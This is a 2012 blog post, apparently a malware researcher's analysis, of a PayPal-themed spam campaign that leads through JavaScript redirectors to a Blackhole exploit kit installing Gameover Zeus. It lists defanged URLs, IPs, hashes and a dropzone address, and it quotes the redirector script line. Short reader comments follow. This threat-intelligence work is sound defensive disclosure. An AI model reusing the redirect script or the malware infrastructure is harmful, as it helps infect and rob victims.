Paypal themed spam!

Subject:
YOU SENT A PAYMENT

URLs:
ispesa[.]com/8pe5eCMZ/index.html
gfclock[.]com/8pe5eCMZ/index.html
madiks[.]net/k4H1CSBf/index.html

PayPal-You Sent a Payment

The text ‘View the details of this transaction online’ contain hyperlinks to compromised websites as shown above. These pages contains no content but only 5 JS:

50.57.29.172/hVg3GFAo/js.js
finantariauto[.]ro/5ZqETXNE/js.js
ipecturkey[.]com/E2UNfoGY/js.js
murlidharinstitutes[.]org/ShSyPU9s/js.js
oompa[.]de/VTwQKwDD/js.js

These javascript redirectors contain the following document.location script that send victims to a Blackhole Exploit kit at 209.59.217.101:

document.location=’hxxp://closteage.com/showthread.php?t=d7ad916d1c0396ff’;

It downloadeds Gameover Zeus (installer) from the following location:

closteage[.]com /q.php?f=7245d&e=2

File: info.exe
MD5: 246d63e7b0fb47ee9c42ee588d0792eb
Size: 2,83,160 bytes

It then installs Zeus in %APPDATA% which had following properties:

File: dewy.exe
MD5: d86ad63612e6276238c6f7bd2b35b4f3
Size: 2,83,160 bytes
Other: This file is digitally signed by ‘5r6Io0OJu3L2’
Company Name: Twain Working Group
File Description: Twain.dll Client’s 32-Bit Thunking Server
File Version: 1,7,0,0
Internal Name: Twunk_32
Original Filename: Twunk_32.exe
Product Name: Twain Thunker
Timestamp: 2011:02:03 20:33:28+01:00

Digital signature of installed Gameover zeus payloads are now changing to ‘5r6Io0OJu3L2’ first time after 5 days. Earlier payloads used to be signed by “SDOkUGUnMWwv”.

This Gameover Zeus payload ex-filtrated stolen data to dropzone at 87.97.164.223:22005 /index.php.
This payload had a bot id of “NR21” cid of “3005”. Webinjects were pulled from the same proxy at 87.97.164.223:22005.

Advertisements

6 Comments

  1. Posted June 27, 2012 at 12:00 am | Permalink | Reply

    Banking statements.

  2. Amy
    Posted June 27, 2012 at 7:32 pm | Permalink | Reply

    hate when scam are being put on

  3. Posted June 29, 2012 at 7:14 pm | Permalink | Reply

    hate scams

  4. Posted August 3, 2012 at 6:21 pm | Permalink | Reply

    don’t believe everything that comes into your email

  5. krista
    Posted August 4, 2012 at 2:12 am | Permalink | Reply

    These two articles have some of the similar words in each. The information given by both is somewhat relevent

  6. andrew
    Posted August 20, 2012 at 9:09 pm | Permalink | Reply

    wat a load of shit

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: